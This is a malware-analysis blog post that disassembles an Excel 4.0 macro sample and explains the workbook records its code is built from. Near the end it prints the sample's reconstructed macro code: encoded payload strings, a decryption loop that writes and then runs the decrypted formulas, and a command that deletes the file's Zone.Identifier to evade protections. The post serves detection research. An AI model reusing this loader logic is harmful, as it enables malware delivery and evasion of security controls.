Decompiling Excel Formula/Macro 4.0 files to understand their execution

Office malware has been around for a long time. In the past I’ve written several blogs [1,2,3,4] about the basics and beyond. In this blog we’ll focus on Excel Formula (XF) 4.0. I wasn’t too familiar with XF 4.0 before I started looking into it, so learn with me.

With VBA macros you’ll find these easily by decompressing some streams and look at the source (that is, if it hasn’t been removed or replaced to avoid detection). Word, if the p-code is compiled on the same VBA version, will simply run the p-code instead of compiling the source from scratch.

So when we deal with XF – where is the source? Is there a source? Where is the p-code? What actually runs and how does it run? That’s what I’ll try to explain in this short blog post.

All the magic happens in the Workbook stream. This is a simple stream to parse and Microsoft have documented it well (very different compared to when we had to reverse the OLE2 file format in the late 90s). There are many tools out there to extract streams from Office documents, and any engine out there will provide access to the Workbook by default. The workbook itself is 171506 bytes long.

To start with, how do we see if a file with XF has a macro sheet inserted? If we look at record 133 (boundsheet8) there are clear signs that the files need more inspection (macro sheet, hidden, very hidden, etc). Here are some of the records that will interest you to find more intelligence:

IdNameDescription
6FormulaContains the binary code that runs the compiled code
24 LBLSpecifies a defined name
252 SST Specifies string constants
255 ExtSST Specifies a location of sets of strings which are shared in a table (index into the SST table)
512 Dimensions specify the range of the sheet (rows and columns)
638 RK specifies the numeric data of a single cell
189 MulRk specifies a series of cells with their numerical data
253 LabelSst specifies a cell that contains a string
2057 BOF specifies the beginning of a workbook and what type of substream it is

Armed with this we’ll have a look at sample – 02cb7d611f4f45db1a9fdac6c9b0902fd246c302. When I first checked the sample (2 hours old on VT), it was detected by only 5 engines.

So what’s so special about it? Why did so many seem to miss it when the sample was new? That’s what interested me to look into this. Commonly used tools like olevba didn’t extract much useful information – and that again added to my curiosity.

It has a visible macro sheet and this has a macro called Auto_Open (This name is a keyword defined from a list of possible names). In total it contains 2 sheets (Sheet1 and IFKPCYYA – which is the macro sheet).

When we get to the macro-sheet, we find this BOF (offset 160606)

This means, which you can also find in the boundsheet8 record, that there is macros in the workstream. To find them we’ll look for the Formula records.

When we find the first Formula-record (at offset 162110 in the Workbook) it looks like this:

What does this mean? When you look at the documentation for a Formula record you’ll find out that is has a header (20 bytes) which describes which cell and gives you more meta-data about what is going to happen. The next 2 bytes gives you the length of the actual opcodes (0x000F). The next record is 0x17 which is a PtgStr. This contains amongst others the length of the embedded string. The next opcode you’ll find is 0x1e – PgtInt which describes that an Integer is to follow. The last opcode in this section is 0x42 – PtgFuncVar. This describes what function it wants to invoke and how many parameters this function requires.

row 1, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
17 05 00 78 5F 62 32     PtgStr: x_b2w
1E 00 00              PtgInt: 0
42 02 3D 80           PtgFuncVar: DEFINE.NAME, param=2, tab=61, fCeFunc=1

When you convert the formula-record above to code, you’ll get:

So you basically see it seems to push two variables to a stack (the string “x_b2w” and the integer 0). It then invokes the function DEFINE.NAME. It looks like it’s setting the variable “x_b2w” to 0.

The next formula (at offset 162837) looks like this:

After the header (which is dumped first) – we see the following code being run:

So, it’s starting to build a while loop, while index 2 (which’ll I’ll describe shortly) is

row 2, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
43 02 00 00 00        PtgName: index 2
1E 31 00              PtgInt: 49
09                    PtgLt:
41 AC 00              PtgFunc: WHILE (172)

compared against the integer 49 – and as long as it’s LT (Less Than), it will iterate…

Index 2 brings me on to some of the other records you’ll need (mentioned in the table) to fetch data needed for the disassembly. Sometime you’ll see them reference data in sheets; strings, integers or doubles.

There is an Lbl record (offset 11932 in Workbook stream)

This describes two entries. The second one is the string “x_l5”. So now you know it is comparing the value x_l5 to the integer 49. Not a surprise as the previous opcode set it to 0.

This is a quest you’ll need to follow with the rest of the opcodes, and here is what it will look like once you complete this quest:

row 1, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
17 05 00 78 5F 62 32 PtgStr: x_b2w
1E 00 00              PtgInt: 0
42 02 3D 80          PtgFuncVar: DEFINE.NAME, param=2, tab=61, fCeFunc=1

row 2, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
43 02 00 00 00        PtgName: index 2
1E 31 00              PtgInt: 49
09                    PtgLt:
41 AC 00              PtgFunc: WHILE (172)

row 3, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
17 04 00 78 5F 6C 35 PtgStr: x_l5
1F 00 00 00 00 00 00 PtgNum: 0.000000
42 02 3D 80          PtgFuncVar: DEFINE.NAME, param=2, tab=61, fCeFunc=1

row 4, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
17 05 00 78 5F 62 32 PtgStr: x_b2w
43 02 00 00 00        PtgName: index 2
1E 01 00              PtgInt: 1
03                    PtgAdd:
42 02 3D 80          PtgFuncVar: DEFINE.NAME, param=2, tab=61, fCeFunc=1

row 5, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
43 03 00 00 00        PtgName: index 3
1E 16 00              PtgInt: 22
09                    PtgLt:
41 AC 00              PtgFunc: WHILE (172)

row 6, col 0, ifxe 15, FormulaValue=01 00 00 00 00 00 fExpr0=FFFF flags=0000
17 04 00 78 5F 6C 35 PtgStr: x_l5
43 03 00 00 00        PtgName: index 3
1E 01 00              PtgInt: 1
03                    PtgAdd:
42 02 3D 80          PtgFuncVar: DEFINE.NAME, param=2, tab=61, fCeFunc=1

row 7, col 0, ifxe 15, FormulaValue=02 00 1D 00 00 00 fExpr0=FFFF flags=0000
19 01 00 00          PtgAttrSemi:
43 03 00 00 00        PtgName: index 3
1E 01 00              PtgInt: 1
03                    PtgAdd:
1E 26 00              PtgInt: 38
43 02 00 00 00        PtgName: index 2
03                    PtgAdd:
42 02 DB 00          PtgFuncVar: ADDRESS, param=2, tab=219, fCeFunc=0
42 01 94 00          PtgFuncVar: INDIRECT, param=1, tab=148, fCeFunc=0
17 09 00 6B 6F 76 65 PtgStr: koveowvnb
0B                    PtEq:

row 8, col 0, ifxe 15, FormulaValue=02 01 1D 00 00 00 fExpr0=FFFF flags=0000
19 01 00 00          PtgAttrSemi:
 44 2C 00 01 C0        PtgRef: loc col=1, row=44, value=EMPTY
43 03 00 00 00        PtgName: index 3
1E 01 00              PtgInt: 1
03                    PtgAdd:
1E 26 00              PtgInt: 38
43 02 00 00 00        PtgName: index 2
03                    PtgAdd:
42 02 DB 00          PtgFuncVar: ADDRESS, param=2, tab=219, fCeFunc=0
42 01 94 00          PtgFuncVar: INDIRECT, param=1, tab=148, fCeFunc=0
08                    PtgConcat:

row 9, col 0, ifxe 15, FormulaValue=02 01 1D 00 00 00 fExpr0=FFFF flags=0000
44 07 00 00 C0        PtgRef: loc col=0, row=7, value=EMPTY
19 02 12 00          PtgAttrIf: 0012
17 04 00 78 5F 6C 35 PtgStr: x_l5
1E 18 00              PtgInt: 24
42 02 3D 80          PtgFuncVar: DEFINE.NAME, param=2, tab=61, fCeFunc=1
19 08 14 00          PtgAttrGoto: 0014
24 2C 00 01 C0        PtgRef: loc col=1, row=44, value=EMPTY
44 08 00 00 C0        PtgRef: loc col=0, row=8, value=EMPTY
41 6C 00              PtgFunc: SET.VALUE (108)
19 08 03 00          PtgAttrGoto: 0003
42 03 01 00          PtgFuncVar: IF, param=3, tab=1, fCeFunc=0

row 10, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
41 AE 00              PtgFunc: NEXT (174)

row 11, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
44 2C 00 01 C0        PtgRef: loc col=1, row=44, value=EMPTY
17 02 00 52 5B        PtgStr: R[
43 02 00 00 00        PtgName: index 2
08                    PtgConcat:
17 05 00 5D 43 5B 30 PtgStr: ]C[0]
08                    PtgConcat:
19 40 00 01          PtgAttrSpace: 0100
24 48 00 00 C0        PtgRef: loc col=0, row=72, value=EMPTY
21 4F 00              PtgFunc: ABSREF (79)
42 02 60 80          PtgFuncVar: FORMULA, param=2, tab=96, fCeFunc=1

row 12, col 0, ifxe 15, FormulaValue=01 00 00 00 00 00 fExpr0=FFFF flags=0000
24 2C 00 01 C0        PtgRef: loc col=1, row=44, value=EMPTY
17 00 00              PtgStr:
41 6C 00              PtgFunc: SET.VALUE (108)

row 13, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
41 AE 00              PtgFunc: NEXT (174)

row 202, col 0, ifxe 15, FormulaValue=01 00 00 00 00 00 fExpr0=FFFF flags=0000
42 00 36 00          PtgFuncVar: HALT, param=0, tab=54, fCeFunc=0

Alright, so we see 2 loops, an outer and an inner. Basically you see an outer loop decrypting one line at the time with the inner loop, then calling the function Formula to execute the decrypted statement. This means it has hidden code present and there should be no reason not to block this file in my view.

In addition, for complete clarity, you’ll need to find the data in the locations it reads and writes to – hence the other records you need to enumerate to access and decode the contents of locations. This is in case you want to do more than just disassemble the code, but maybe let the logic unfold to access each unencrypted command?

What more can we extract from this sample from looking at the Workbook stream? Some source-code? You could probably build a pretty good source-code from the p-code, but in this sample there is another way.

=SET.VALUE(R1C3,”adadadadadadad”)
=SET.VALUE(R1C3,”pupupupupupupupupupupupupupupupupupupu”)
=SET.VALUE(R2C3,”efefefefefefefef”)
=SET.VALUE(R2C3,”ipipipipipipipipip”)
=SET.VALUE(R3C3,”g4g4g4″)
=SET.VALUE(R3C3,”ieieieieieieieieie”)
=SET.VALUE(R4C3,”zhzhzhzhzhzhzhzhzh”)
=SET.VALUE(R4C3,”fifififififififififififififififififififi”)
=SET.VALUE(R5C3,”f5″)
=SET.VALUE(R5C3,”hjhjhjhjhjhjhjhjhjhjhjhjhjhj”)
=SET.VALUE(R6C3,”ccccc”)
=SET.VALUE(R6C3,”rarararararararararararararara”)
=SET.VALUE(R1C3,”!-!]Ttdsr]Ovamhd[Endtndost[#(“) =SET.VALUE(R2C3,”<EDGHOD/MBLF’#ejkf^!-EPOFM)obsi^%#qd-kr#+4(*") =SET.VALUE(R3C3,"GVSHUDMM)ejkf^+#ubq!u20>mfv!@dsjufWPakdds)!#Ljbsntngs/WNKISUO#!:#(“) =SET.VALUE(R4C3,”+#u20/nqdo’#!HDU!#+#!isuot90.dnvqtddnnap-dnn.dnnap-qgq>1-715567445/:41790#!-ebktd*:#(“) =SET.VALUE(R5C3,”<GVSHUDMM)ejkf^+#u20/rfme’:#(“)
=SET.VALUE(R6C3,”<GVSHUDMM)ejkf^+#ubq!az<odxBbuhwdYNcifbu'#!BCPCC-Tssdbl#!*:#(") =SET.VALUE(R7C3,"<GVSHUDMM)ejkf^+#az-pofm)(<!“) =SET.VALUE(R8C3,”+#az-uxqd>0<!*”) =SET.VALUE(R9C3,”<GVSHUDMM)ejkf^+#az-xqjsf’w02-sdtopmtdCnex!“) =SET.VALUE(R10C3,”+#az-TwdUnGhmd)!#[]Ttdsr][Qtckjb][Endtndost[]id-dom!#+3(“)
=SET.VALUE(R11C3,”<GVSHUDMM)ejkf^+#az-dkprf'*:#(") =SET.VALUE(R12C3,"<GBMNTD)ejkf^(“)
=SET.VALUE(R13C3,”<FWFB)!fwqkpqfq/dyd!!’obsi^%#qd-kr#(") =SET.VALUE(R14C3,"<XGJKF'JRFQSNS'GHMDT'qug^'!kb/bqk#(*(") =SET.VALUE(R15C3,"<X@JS)MPV)(,!1/;/1910#(") =SET.VALUE(R16C3,"<ODYS)(") =SET.VALUE(R17C3,"<GHMD/CFKFSF'qug^'!sb/it!*") =SET.VALUE(R18C3,"<FWFB)!fwqkpqfq/dyd!!'obsi^%#id-dom!*!!”)
=SET.VALUE(R19C3,””)
=ERROR(TRUE,R1C1)       
=FILE.DELETE(GET.DOCUMENT(IF(COS(RAND())<3,1,100)+1)&”\”&GET.DOCUMENT(88)&”:Zone.Identifier”)
=ERROR(FALSE)  
=SET.VALUE(R21C4,202)
=SET.VALUE(R21C4,IF(SIN(LEN(GET.WORKSPACE(1)))<2,IF(RESET.TOOLBAR(1),1,100),100))
=WHILE(R21C4<=20)     
=SET.VALUE(R23C4,INDIRECT(ADDRESS(R21C4,3)))                  
=SET.VALUE(R24C4,LEN(R23C4))        
=SET.VALUE(R57C5,””)                  
=SET.VALUE(R27C4,1)         
=WHILE(R27C4<=R24C4)
=SET.VALUE(R57C5,R57C5&CHAR(CODE(MID(R23C4,R27C4,1))+IF(MOD(R27C4,2)=0,-1,1)))
=SET.VALUE(R27C4,R27C4+1)
=NEXT()         
=SET.VALUE(R21C4,R21C4+1)           
=FORMULA(R57C5, ABSREF(“R[“&R21C4&”]C[0]”,R41C2))
=NEXT()        
=RUN(R41C2)

In short terms, the sheet is built of columns and rows, and “all you need to do” is to build your own virtual sheet and map each resource-record (string, integer, double etc) “from each sheet” from the Workbook stream into this virtual sheet. Each resource-record seems to have a random piece of the puzzle, and the coordinates for each piece solves the puzzle. Then you can extract the “source” of the sheet(s) without opening Excel at all. The cell-access is also needed to get the input data the p-code needs would you want to “run it”.

If we compare the “source-code” inner loop and look at the p-code, there seems to be big differences. The source-code does some decryption, while the p-code doesn’t seem to do so.

Virus Total (VT) runs only command-line scanners of each product and do not test all the other layers each product have to offer to protect a real user. It could be that the vendors’ products offers other layers of defence to catch the sample if it works (I have a doubt it doesn’t based on this research), but I still think the sample reveals enough obvious hints that a simple command-line scanner should have picked it up in the first place.

Going from here you have many options to take this to the next level, which is for another time.

Writing good support for XF 4.0 should be an effort anti-malware companies should do, and even though XF has been around for a while you might want to update the support as this trends up. Let me know if you need help. I’ve really enjoyed researching XF 4.0 for a few days in my spare time and I will now start the quest for the next area that needs research.

[1] https://www.forcepoint.com/blog/x-labs/assessing-risk-office-documents-part-1-introduction

[2] https://www.forcepoint.com/blog/x-labs/assessing-risk-office-documents-part-2-hide-my-code-or-download-it

[3] https://www.forcepoint.com/blog/x-labs/assessing-risk-office-documents-part-3-exploited-%E2%80%9Cweaponized%E2%80%9D-rtfs 

[4] https://www.forcepoint.com/blog/x-labs/assessing-risk-office-documents-part-4-cve-and-generic-exploit-detection

By Kurt Natvig – Forcepoint

Comments are closed.

X